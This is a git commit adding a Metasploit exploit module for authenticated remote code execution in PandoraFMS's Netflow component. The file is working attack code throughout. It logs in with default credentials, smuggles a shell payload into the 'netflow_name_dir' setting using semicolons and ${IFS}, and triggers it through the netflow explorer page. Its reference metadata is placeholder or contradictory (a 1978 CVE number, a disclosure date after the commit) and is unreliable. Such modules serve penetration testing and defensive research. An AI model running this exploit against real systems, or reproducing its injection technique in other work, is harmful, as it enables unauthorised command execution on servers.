Adds module for PandoraFMS Netflow RCE

msutovsky-r7 · msutovsky-r7 · commit 828b6aadfbdb · 2025-05-20T13:43:54.000+02:00
diff --git a/modules/exploits/linux/http/pandora_fms_auth_netflow_rce.rb b/modules/exploits/linux/http/pandora_fms_auth_netflow_rce.rb
@@ -0,0 +1,194 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'PandoraFMS Netflow Authenticated Remote Code Execution',
+        'Description' => %q{
+          This module exploits a command injection vulnerability in Netflow component of PandoraFMS. The module requires set of user credentials to modify Netflow settings. Also, Netflow binaries have to present on the system.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => ['msutovsky-r7'], # researcher, module dev
+        'References' => [
+          [ 'OSVDB', '12345' ],
+          [ 'EDB', '12345' ],
+          [ 'URL', 'http://www.example.com'],
+          [ 'CVE', '1978-1234']
+        ],
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ ARCH_CMD ],
+        'Privileged' => false,
+        'Targets' => [
+
+          [
+            'Linux/Unix Command',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => [ ARCH_CMD]
+            }
+          ]
+        ],
+        #        'Payload' => {
+        #          'BadChars' => " "
+        #        },
+        'DisclosureDate' => '2025-12-30',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 80
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to PandoraFMS application', '/pandora_console/']),
+        OptString.new('USERNAME', [true, 'Username to PandoraFMS applicaton', 'admin']),
+        OptString.new('PASSWORD', [true, 'Password to PandoraFMS application', 'pandora'])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'vars_get' => { 'login' => '1' },
+      'keep_cookies' => true
+    })
+    return Msf::Exploit::CheckCode::Unknown('Received unexpected response') unless res&.code == 200
+
+    html = res.get_html_document
+
+    return Msf::Exploit::CheckCode::Unknown('Response seems to be empty') unless html
+
+    version = html.at('div[@id="ver_num"]')&.text
+
+    @csrf_token = html.at('input[@id="hidden-csrf_code"]')&.attributes&.fetch('value', nil)
+
+    return Msf::Exploit::CheckCode::Safe('Application is not probably PandoraFMS') unless version
+
+    version = version[1..]&.sub('NG', '')
+
+    vprint_warning('Token was not parsed, will try again') unless @csrf_token
+
+    vprint_status("Version #{version} detected")
+
+    return Exploit::CheckCode::Vulnerable("Vulnerable PandoraFMS version #{version} detected") if Rex::Version.new(version).between?(Rex::Version.new('7.0.776'), Rex::Version.new('7.0.777'))
+
+    Msf::Exploit::CheckCode::Safe('Running version is not vulnerable')
+  end
+
+  def get_csrf_token
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'vars_get' => { 'login' => '1' },
+      'keep_cookies' => true
+    })
+    fail_with Failure::UnexpectedReply, 'Recevied unexpected response' unless res&.code == 200
+
+    html = res.get_html_document
+
+    fail_with Failure::UnexpectedReply, 'Empty response received' unless html
+    html.at('div[@id="ver_num"]')&.text
+
+    @csrf_token = html.at('input[@id="hidden-csrf_code"]')&.attributes&.fetch('value', nil)
+
+    fail_with Failure::NotFound, 'Could not found CSRF token' unless @csrf_token
+  end
+
+  def login
+    res = send_request_cgi!({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'keep_cookies' => true,
+      'vars_get' => { 'login' => '1' },
+      'vars_post' =>
+      {
+        'nick' => datastore['USERNAME'],
+        'pass' => datastore['PASSWORD'],
+        'login_button' => "Let's go",
+        'csrf_code' => @csrf_token
+      }
+    })
+    fail_with Failure::NoAccess, 'Invalid credentials' unless res&.code == 200 && res.body.include?('id="welcome-icon-header"') || res.body.include?('id="welcome_panel"') || res.body.include?('godmode')
+  end
+
+  def configure_netflow
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'vars_get' => { 'sec' => 'general', 'sec2' => 'godmode/setup/setup', 'section' => 'net' }
+    })
+
+    fail_with Failure::NotFound, 'Netflow might not be enabled' unless res&.code == 200
+
+    html = res.get_html_document
+
+    fail_with Failure::UnexpectedReply, 'Unexpected response when trying to configure Netflow' unless html
+
+    netflow_daemon_value = html.at('input[@name="netflow_daemon"]')&.attributes&.fetch('value', nil)
+    netflow_nfdump_value = html.at('input[@name="netflow_nfdump"]')&.attributes&.fetch('value', nil)
+    netflow_nfexpire_value = html.at('input[@name="netflow_nfexpire"]')&.attributes&.fetch('value', nil)
+    netflow_max_resolution_value = html.at('input[@name="netflow_max_resolution"]')&.attributes&.fetch('value', nil)
+    netflow_disable_custom_lvfilters_sent_value = html.at('input[@name="netflow_disable_custom_lvfilters_sent"]')&.attributes&.fetch('value', nil)
+    netflow_max_lifetime_value = html.at('input[@name="netflow_max_lifetime"]')&.attributes&.fetch('value', nil)
+    netflow_interval_value = html.at('select[@name="netflow_interval"]//option[@selected="selected"]')&.attributes&.fetch('value', nil)
+
+    fail_with Failure::Unknown, 'Failed to get existing Netflow configuration' unless netflow_daemon_value && netflow_nfdump_value && netflow_nfexpire_value && netflow_max_resolution_value && netflow_disable_custom_lvfilters_sent_value && netflow_max_lifetime_value && netflow_interval_value
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'vars_get' => { 'sec' => 'general', 'sec2' => 'godmode/setup/setup', 'section' => 'net' },
+      'vars_post' =>
+      {
+        'netflow_name_dir' => ';' + payload.encoded.gsub(' ', '${IFS}') + ';',
+        'netflow_daemon' => netflow_daemon_value,
+        'netflow_nfdump' => netflow_nfdump_value,
+        'netflow_max_resolution' => netflow_max_resolution_value,
+        'netflow_disable_custom_lvfilters_sent' => netflow_disable_custom_lvfilters_sent_value,
+        'netflow_max_lifetime' => netflow_max_lifetime_value,
+        'netflow_interval' => netflow_interval_value,
+        'update_config' => '1',
+        'upd_button' => 'Update'
+      }
+    })
+    fail_with Failure::PayloadFailed, 'Failed to configure Netflow' unless res&.code == 200
+  end
+
+  def trigger_payload
+    send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'vars_get' => { 'sec' => 'network_traffic', 'sec2' => 'operation/netflow/netflow_explorer' }
+    })
+  end
+
+  def exploit
+    # do we have csrf token already
+    get_csrf_token unless @csrf_token
+
+    login
+
+    configure_netflow
+
+    trigger_payload
+  end
+end
